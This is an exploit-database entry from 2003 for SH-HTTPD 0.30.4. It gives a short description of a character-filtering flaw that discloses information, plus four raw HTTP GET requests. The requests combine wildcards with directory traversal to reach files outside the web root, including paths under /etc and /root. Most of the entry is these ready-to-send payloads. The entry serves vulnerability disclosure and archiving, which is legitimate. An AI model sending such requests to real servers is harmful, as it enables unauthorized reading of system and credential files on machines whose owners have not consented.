SH-HTTPD 0.30.4 - Character Filtering Remote Information Disclosure

2003-10-27T00:00:00
ID EXPLOITPACK:F21B2546FE4583DD4B3F56BC9CB041D0
Type exploitpack
Reporter dong-h0un U
Modified 2003-10-27T00:00:00

Description

SH-HTTPD 0.30.4 - Character Filtering Remote Information Disclosure

                                        
                                            source: https://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*